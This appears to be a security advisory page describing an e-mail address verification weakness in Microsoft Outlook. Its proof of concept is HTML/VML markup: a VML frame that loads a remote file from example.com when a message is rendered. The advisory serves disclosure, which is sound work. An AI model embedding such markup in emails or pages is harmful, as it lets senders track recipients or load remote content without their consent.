• info
• discussion
• exploit
• solution
• references

Microsoft Outlook Mail Client E-mail Address Verification Weakness

No exploit is required.

The following proof of concept has been provided:
<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION:
relative; TOP: 30px; HEIGHT: 200px"
src = "http://www.example.com/duh.txt#malware"></v:vmlframe>

<HTML>
<HEAD>
<STYLE>
v\:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>